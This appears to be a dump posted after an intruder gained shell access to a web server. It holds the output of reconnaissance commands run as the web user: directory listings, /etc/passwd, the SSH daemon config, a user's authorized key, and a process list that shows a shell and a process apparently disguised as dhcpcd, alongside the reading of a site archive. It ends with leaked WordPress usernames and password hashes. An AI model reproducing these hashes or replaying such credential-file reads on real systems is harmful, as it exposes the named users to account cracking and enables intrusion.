drw-------   2 root root  4096 Sep  1 07:38 backup-fix
drwxr-xr-x   2 root root  4096 Oct 11 09:00 bin
drwxr-xr-x   3 root root  4096 Nov 30 06:53 boot
drwxr-xr-x   3 root root  4096 Nov 11 16:56 build
drwxr-xr-x   2 root root  4096 Jul  9 05:29 cdrom
drwxr-xr-x  14 root root  3800 Nov 30 06:53 dev
drwxr-xr-x  91 root root  4096 Dec  2 06:34 etc
drwxr-xr-x   3 root root  4096 Aug  3 11:48 home
lrwxrwxrwx   1 root root    32 Nov 30 06:53 initrd.img -> boot/initrd.img-2.6.32-26-server
lrwxrwxrwx   1 root root    32 Oct  4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server
drwxr-xr-x  13 root root 12288 Nov 18 06:54 lib
lrwxrwxrwx   1 root root     4 Jul  9 05:28 lib64 -> /lib
drwx------   2 root root 16384 Jul  9 05:28 lost+found
drwxr-xr-x   2 root root  4096 Jul  9 15:17 maint
drwxr-xr-x   3 root root  4096 Jul  9 05:28 media
drwxr-xr-x   4 root root  4096 Jul  9 20:03 mnt
drwxr-xr-x   3 root root  4096 Oct  7 16:53 opt
dr-xr-xr-x 227 root root     0 Nov 11 10:45 proc
drwx------   9 root root  4096 Nov 25 09:08 root
drwxr-xr-x   2 root root  4096 Oct 29 19:00 sbin
drwxr-xr-x   2 root root  4096 Dec  5  2009 selinux
drwxr-xr-x   2 root root  4096 Jul  9 05:28 srv
drwxr-xr-x  13 root root     0 Nov 11 10:45 sys
drwxrwxrwt   3 root root  4096 Dec  4 14:59 tmp
drwxr-xr-x  10 root root  4096 Jul  9 05:28 usr
drwxr-xr-x  19 root root  4096 Sep 24 09:26 var
lrwxrwxrwx   1 root root    29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server
lrwxrwxrwx   1 root root    29 Oct  4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false
smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
emgent:x:1003:1002:,,,:/home/emgent:/bin/bash
ossec:x:1004:1003::/var/ossec:/bin/false
ossecm:x:1005:1003::/var/ossec:/bin/false
ossecr:x:1006:1003::/var/ossec:/bin/false

$ cat /etc/issue
Ubuntu 10.04.1 LTS \n \l


$ cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile     %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

$ cd /home

$ ls -la
total 12
drwxr-xr-x  3 root   root   4096 Aug  3 11:48 .
drwxr-xr-x 26 root   root   4096 Nov 30 06:53 ..
drwxr-xr-x  7 emgent emgent 4096 Aug  7 07:45 emgent

$ cd emgent

$ ls -la
total 48
drwxr-xr-x 7 emgent emgent 4096 Aug  7 07:45 .
drwxr-xr-x 3 root   root   4096 Aug  3 11:48 ..
-rw------- 1 emgent emgent  259 Oct 18 11:39 .bash_history
-rw-r--r-- 1 emgent emgent  220 Aug  3 11:48 .bash_logout
-rw-r--r-- 1 emgent emgent 3103 Aug  3 11:48 .bashrc
drwx------ 2 emgent emgent 4096 Aug  3 11:49 .cache
drwx------ 2 emgent emgent 4096 Aug  3 11:49 .irssi
-rw------- 1 emgent emgent    9 Aug  3 11:50 .nano_history
-rw-r--r-- 1 emgent emgent  675 Aug  3 11:48 .profile
drwxr-xr-x 2 emgent emgent 4096 Aug  3 11:49 .ssh
drwxr-xr-x 3 emgent emgent 4096 Aug  7 07:45 .subversion
drwxr-xr-x 4 emgent emgent 4096 Aug  7 07:46 exploitdb



$ cd .ssh

$ ls
authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy

$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  23680  1244 ?        Ss   Nov11   0:07 /sbin/init
root         2  0.0  0.0      0     0 ?        S    Nov11   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    Nov11   0:01 [migration/0]
root         4  0.0  0.0      0     0 ?        S    Nov11   0:12 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S    Nov11   0:02 [migration/1]
root         7  0.0  0.0      0     0 ?        S    Nov11   0:04 [ksoftirqd/1]
root         8  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/1]
root         9  0.0  0.0      0     0 ?        S    Nov11   0:02 [migration/2]
root        10  0.0  0.0      0     0 ?        S    Nov11   0:02 [ksoftirqd/2]
root        11  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/2]
root        12  0.0  0.0      0     0 ?        S    Nov11   0:01 [migration/3]
root        13  0.0  0.0      0     0 ?        S    Nov11   0:05 [ksoftirqd/3]
root        14  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/3]
root        15  0.0  0.0      0     0 ?        S    Nov11   0:32 [events/0]
root        16  0.0  0.0      0     0 ?        S    Nov11  13:44 [events/1]
root        17  0.0  0.0      0     0 ?        S    Nov11   0:17 [events/2]
root        18  0.0  0.0      0     0 ?        S    Nov11   0:18 [events/3]
root        19  0.0  0.0      0     0 ?        S    Nov11   0:00 [cpuset]
root        20  0.0  0.0      0     0 ?        S    Nov11   0:00 [khelper]
root        21  0.0  0.0      0     0 ?        S    Nov11   0:00 [netns]
root        22  0.0  0.0      0     0 ?        S    Nov11   0:00 [async/mgr]
root        23  0.0  0.0      0     0 ?        S    Nov11   0:00 [pm]
root        25  0.0  0.0      0     0 ?        S    Nov11   0:02 [sync_supers]
root        26  0.0  0.0      0     0 ?        S    Nov11   0:04 [bdi-default]
root        27  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/0]
root        28  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/1]
root        29  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/2]
root        30  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/3]
root        31  0.0  0.0      0     0 ?        S    Nov11  11:09 [kblockd/0]
root        32  0.0  0.0      0     0 ?        S    Nov11   2:17 [kblockd/1]
root        33  0.0  0.0      0     0 ?        S    Nov11   1:33 [kblockd/2]
root        34  0.0  0.0      0     0 ?        S    Nov11   1:14 [kblockd/3]
root        35  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpid]
root        36  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpi_notify]
root        37  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpi_hotplug]
root        38  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/0]
root        39  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/1]
root        40  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/2]
root        41  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/3]
root        42  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata_aux]
root        43  0.0  0.0      0     0 ?        S    Nov11   0:00 [ksuspend_usbd]
root        44  0.0  0.0      0     0 ?        S    Nov11   0:00 [khubd]
root        45  0.0  0.0      0     0 ?        S    Nov11   0:00 [kseriod]
root        46  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmmcd]
root        51  0.0  0.0      0     0 ?        S    Nov11   0:00 [khungtaskd]
root        52  0.0  0.0      0     0 ?        S    Nov11   0:30 [kswapd0]
root        53  0.0  0.0      0     0 ?        SN   Nov11   0:00 [ksmd]
root        54  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/0]
root        55  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/1]
root        56  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/2]
root        57  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/3]
root        58  0.0  0.0      0     0 ?        S    Nov11   0:00 [ecryptfs-kthrea]
root        59  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/0]
root        60  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/1]
root        61  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/2]
root        62  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/3]
root        65  0.0  0.0      0     0 ?        S    Nov11   0:00 [pciehpd]
root        66  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_0]
root        67  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_1]
root        69  0.0  0.0      0     0 ?        S    Nov11   0:00 [kstriped]
root        70  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/0]
root        71  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/1]
root        72  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/2]
root        73  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/3]
root        74  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpath_handlerd]
root        75  0.0  0.0      0     0 ?        S    Nov11   0:00 [ksnapd]
root        76  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/0]
root        77  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/1]
root        78  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/2]
root        79  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/3]
root        80  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/0]
root        81  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/1]
root        82  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/2]
root        83  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/3]
root       191  0.0  0.0      0     0 ?        S    Nov11   1:03 [mpt_poll_0]
root       192  0.0  0.0      0     0 ?        S    Nov11   0:00 [mpt/0]
root       268  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_2]
root       285  0.3  0.0      0     0 ?        S    Nov11 125:09 [jbd2/sda1-8]
root       286  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
root       287  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
root       288  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
root       289  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
root       322  0.3  0.0      0     0 ?        S    Nov11 115:40 [flush-8:0]
root       347  0.0  0.0  16904   640 ?        S    Nov11   0:00 upstart-udev-bridge --daemon
root       363  0.0  0.0  16920   416 ?        S<s  Nov11   0:00 udevd --daemon
root       582  0.0  0.0      0     0 ?        S    Nov11   0:00 [kpsmoused]
syslog     714  0.0  0.0 191492  1148 ?        Sl   Nov11   3:22 rsyslogd -c4
root       732  0.0  0.0  49260   528 ?        Ss   Nov11   0:01 /usr/sbin/sshd
root       773  0.0  0.0   6080   284 tty4     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty4
root       777  0.0  0.0   6080   284 tty5     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty5
root       787  0.0  0.0   6080   284 tty2     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty2
root       788  0.0  0.0   6080   284 tty3     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty3
root       792  0.0  0.0   6080   284 tty6     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty6
root       806  0.0  0.0  21076   428 ?        Ss   Nov11   0:07 cron
daemon     807  0.0  0.0  18884   348 ?        Ss   Nov11   0:00 atd
root       817  0.0  0.0  11284   428 ?        Ss   Nov11   1:53 /usr/sbin/irqbalance
root       950  0.0  0.0  84384   848 ?        Ss   Nov11   1:24 sendmail: MTA: accepting connections
root      1318  0.0  0.0  53108  4076 ?        Sl   Nov11   7:28 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
root      1354  0.0  0.0  97040   408 ?        Ss   Nov11   0:07 /usr/bin/svnserve -d -r /var/svn/
root      1357  0.0  0.0   6080   284 tty1     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty1
root      3467  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfs_mru_cache]
root      3468  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/0]
root      3469  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/1]
root      3470  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/2]
root      3471  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/3]
root      3472  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/0]
root      3473  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/1]
root      3474  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/2]
root      3475  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/3]
root      3476  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/0]
root      3477  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/1]
root      3478  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/2]
root      3479  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/3]
root      3489  0.0  0.0  16980   372 ?        S<   Nov30   0:00 udevd --daemon
root      3490  0.0  0.0  16980   376 ?        S<   Nov30   0:00 udevd --daemon
root      3491  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsIO]
root      3492  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
root      3493  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
root      3494  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
root      3495  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
root      3496  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsSync]
root      4114  0.0  0.0 107552  1928 ?        S    Nov23   0:00 /usr/bin/svnserve -d -r /var/svn/
root      7702  0.0  0.0 107420  1960 ?        S    13:31   0:00 /usr/bin/svnserve -d -r /var/svn/
root      8080  0.1  0.1 346236 11548 ?        Ss   Nov26  18:14 /usr/sbin/apache2 -k start
root      9853  0.0  0.0   9756   384 ?        Ss   Nov11   1:04 tail -f /var/log/apache2/jesys.log
www-data 10874  0.0  0.6 354384 38764 ?        S    14:15   0:00 /usr/sbin/apache2 -k start
www-data 10909  0.0  0.0  25632  2876 ?        S    14:15   0:00 dhcpcd
www-data 10910  0.0  0.0   4096   656 ?        S    14:15   0:00 /bin/sh
www-data 13491  0.1  0.6 356496 39580 ?        S    14:54   0:01 /usr/sbin/apache2 -k start
root     13493  0.1  0.1 116628 11268 ?        S    14:54   0:00 /usr/bin/svnserve -d -r /var/svn/
www-data 13510  0.0  0.0   4040   524 ?        S    14:55   0:00 cat www.tar.gz
root     13561  0.0  0.0 107420  1940 ?        S    Nov30   0:00 /usr/bin/svnserve -d -r /var/svn/
www-data 13681  0.1  0.5 354240 32356 ?        S    14:57   0:00 /usr/sbin/apache2 -k start
www-data 13884  0.1  0.5 354792 33064 ?        S    14:59   0:00 /usr/sbin/apache2 -k start
www-data 13889  0.2  0.5 353632 31568 ?        S    14:59   0:01 /usr/sbin/apache2 -k start
www-data 13960  0.0  0.6 354384 38812 ?        S    15:01   0:00 /usr/sbin/apache2 -k start
www-data 13976  0.2  0.5 355192 32200 ?        S    15:01   0:00 /usr/sbin/apache2 -k start
www-data 14022  0.0  0.0  25632  2876 ?        S    15:02   0:00 dhcpcd
www-data 14023  0.0  0.0   4096   628 ?        S    15:02   0:00 /bin/sh
www-data 14026  0.2  0.5 353888 33228 ?        S    15:02   0:00 /usr/sbin/apache2 -k start
www-data 14027  0.1  0.5 356512 32860 ?        S    15:02   0:00 /usr/sbin/apache2 -k start
www-data 14062  0.2  0.5 353548 32144 ?        S    15:03   0:00 /usr/sbin/apache2 -k start
www-data 14063  0.1  0.5 353644 30840 ?        S    15:03   0:00 /usr/sbin/apache2 -k start
www-data 14152  0.2  0.5 353376 31236 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
www-data 14154  0.3  0.5 352856 31284 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
www-data 14159  0.1  0.5 353888 30852 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
www-data 14160  0.2  0.5 355332 31280 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
www-data 14163  0.1  0.5 354204 31520 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
www-data 14183  0.1  0.4 353804 30404 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14185  0.2  0.4 352724 30460 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14188  0.2  0.5 353544 32600 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14194  0.1  0.4 353880 30564 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14201  0.1  0.5 353500 31264 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14204  0.2  0.5 354516 32044 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14205  0.1  0.4 353360 29148 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
ossecm   14276  0.0  0.0  16844   644 ?        S    Dec02   0:01 /var/ossec/bin/ossec-maild
root     14286  0.0  0.0  12496   576 ?        S    Dec02   0:03 /var/ossec/bin/ossec-execd
ossec    14291  0.0  0.0  14924  3052 ?        S    Dec02   0:43 /var/ossec/bin/ossec-analysisd
root     14295  0.0  0.0   4236   584 ?        S    Dec02   0:22 /var/ossec/bin/ossec-logcollector
www-data 14315  0.0  0.4 352972 29480 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14316  0.2  0.5 353360 31168 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14317  0.1  0.5 354404 30832 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
www-data 14345  0.2  0.4 352592 30052 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14346  0.1  0.4 354008 30416 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14348  0.1  0.4 352356 29156 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14350  0.0  0.1 347492 10892 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14351  0.1  0.4 353272 30452 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14352  0.3  0.5 354176 31516 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14355  0.3  0.4 352328 29492 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14356  0.2  0.5 354200 31508 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14357  0.0  0.4 352584 28180 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
root     14361  0.0  0.0   4996  1664 ?        S    Dec02   0:34 /var/ossec/bin/ossec-syscheckd
ossec    14365  0.0  0.0  12764   844 ?        S    Dec02   0:00 /var/ossec/bin/ossec-monitord
www-data 14366  0.2  0.4 352348 29836 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14367  0.1  0.4 353492 30468 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14369  0.1  0.4 353424 30616 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14370  0.1  0.5 356216 31440 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14371  0.2  0.5 353996 31636 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14372  0.1  0.4 352356 28228 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14377  0.0  0.1 347236 10808 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14378  0.2  0.4 352612 29308 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
root     14386  0.0  0.0      0     0 ?        Z    15:07   0:00 [host-deny.sh] <defunct>
root     14387  0.0  0.0      0     0 ?        Z    15:07   0:00 [firewall-drop.s] <defunct>
www-data 14407  0.4  0.5 354384 32672 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14408  0.1  0.4 352604 29276 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
www-data 14412  0.3  0.5 354716 32420 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14413  0.4  0.4 352592 29272 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14414  0.2  0.4 352600 28200 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14415  0.3  0.4 352724 29088 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14416  0.2  0.4 353776 29452 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14417  0.2  0.4 353136 28616 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14418  0.3  0.4 353520 29500 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14419  0.7  0.0      0     0 ?        Z    15:08   0:00 [apache2] <defunct>
www-data 14420  0.5  0.5 353976 31084 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14421  0.3  0.4 353252 29180 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14422  0.0  0.1 346724  8076 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14423  0.6  0.5 354352 31720 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14424  0.4  0.4 353808 29848 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14425  0.3  0.4 352584 28252 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14426  0.1  0.1 346748 10564 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14427  0.6  0.4 352976 28944 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14428  0.0  0.1 346724  8204 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14429  0.0  0.1 346724  8196 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14430  0.7  0.4 352976 29032 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14431  0.9  0.4 353668 30120 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14432  0.9  0.4 353368 29668 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14433  0.8  0.4 352976 28836 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14435  1.3  0.4 352716 29364 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14436  1.8  0.4 353736 30320 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14437  0.1  0.1 346236  7760 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
www-data 14438  0.0  0.0  14976  1116 ?        R    15:08   0:00 ps aux
root     19786  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
root     19983  0.0  0.0 107420  1940 ?        S    Nov29   0:00 /usr/bin/svnserve -d -r /var/svn/
root     19989  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
root     20015  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
root     20286  0.0  0.0 107420  1888 ?        S    Nov18   0:00 /usr/bin/svnserve -d -r /var/svn/
mysql    22394 10.4 24.9 2441860 1529604 ?     Ssl  Nov12 3357:17 /usr/sbin/mysqld

$ df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              48G   17G   29G  37% /
none                  3.0G  172K  3.0G   1% /dev
none                  3.0G     0  3.0G   0% /dev/shm
none                  3.0G   56K  3.0G   1% /var/run
none                  3.0G     0  3.0G   0% /var/lock
none                  3.0G     0  3.0G   0% /lib/init/rw
none                   48G   17G   29G  37% /var/lib/ureadahead/debugfs

Wordpress:
admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::[email protected]
dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:[email protected]
innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:[email protected]
ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::[email protected]
sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:[email protected]
loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:[email protected]
ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::[email protected]
dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:[email protected]
emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::[email protected]
j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::[email protected]
ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::[email protected]
Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::[email protected]
fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:[email protected]
rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::[email protected]
djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::[email protected]
xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:[email protected]
muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::[email protected]
Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::[email protected]
didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::[email protected]
zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::[email protected]
bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::[email protected]
bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::[email protected]
